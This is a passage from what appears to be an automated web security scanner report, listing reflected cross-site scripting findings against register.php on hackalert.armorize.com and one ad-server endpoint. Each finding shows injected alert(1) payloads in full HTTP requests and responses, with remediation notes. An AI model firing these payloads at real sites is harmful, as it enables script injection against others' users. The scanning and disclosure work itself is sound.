2.221. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7b7ae%3balert(1)//818c4ea74c5 was submitted in the REST URL parameter 4. This input was echoed as 7b7ae;alert(1)//818c4ea74c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons7b7ae%3balert(1)//818c4ea74c5/tick.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:54 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons7b7ae;alert(1)//818c4ea74c5/tick.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.222. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f951a"-alert(1)-"d01d1512a01 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.pngf951a"-alert(1)-"d01d1512a01 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:19:34 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/tick.pngf951a"-alert(1)-"d01d1512a01?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.223. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5d51f%3balert(1)//a142d027bc5 was submitted in the REST URL parameter 5. This input was echoed as 5d51f;alert(1)//a142d027bc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png5d51f%3balert(1)//a142d027bc5 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:20:05 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/tick.png5d51f;alert(1)//a142d027bc5?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.224. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38f4"><script>alert(1)</script>0e24bcb5c2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/e38f4"><script>alert(1)</script>0e24bcb5c2b/images/icons/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:04 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/e38f4"><script>alert(1)</script>0e24bcb5c2b/images/icons/user.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.225. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b212"-alert(1)-"d168d7e1241 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C3b212"-alert(1)-"d168d7e1241/images/icons/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:03:58 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<3b212"-alert(1)-"d168d7e1241/images/icons/user.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.226. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 10bac%3balert(1)//ebe47a7fa9d was submitted in the REST URL parameter 2. This input was echoed as 10bac;alert(1)//ebe47a7fa9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C10bac%3balert(1)//ebe47a7fa9d/images/icons/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:04:58 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<10bac;alert(1)//ebe47a7fa9d/images/icons/user.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.227. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81967"-alert(1)-"5385296e5c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images81967"-alert(1)-"5385296e5c4/icons/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:09 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images81967"-alert(1)-"5385296e5c4/icons/user.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.228. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fe63e%3balert(1)//53c85f4fdad was submitted in the REST URL parameter 3. This input was echoed as fe63e;alert(1)//53c85f4fdad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/imagesfe63e%3balert(1)//53c85f4fdad/icons/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:46 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</imagesfe63e;alert(1)//53c85f4fdad/icons/user.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.229. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65804"-alert(1)-"bb27b431bb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons65804"-alert(1)-"bb27b431bb/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:34 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons65804"-alert(1)-"bb27b431bb/user.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.230. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b2477%3balert(1)//16f9bf8bc6a was submitted in the REST URL parameter 4. This input was echoed as b2477;alert(1)//16f9bf8bc6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/iconsb2477%3balert(1)//16f9bf8bc6a/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:35 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/iconsb2477;alert(1)//16f9bf8bc6a/user.png?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.231. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fa52a%3balert(1)//e740129cc1c was submitted in the REST URL parameter 5. This input was echoed as fa52a;alert(1)//e740129cc1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.pngfa52a%3balert(1)//e740129cc1c HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:16:09 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/user.pngfa52a;alert(1)//e740129cc1c?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.232. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4bd7"-alert(1)-"98d920a11b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.pnge4bd7"-alert(1)-"98d920a11b HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:03 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</images/icons/user.pnge4bd7"-alert(1)-"98d920a11b?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.233. http://ib.adnxs.com/ab [ccd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27052'-alert(1)-'615e9ecc7a was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

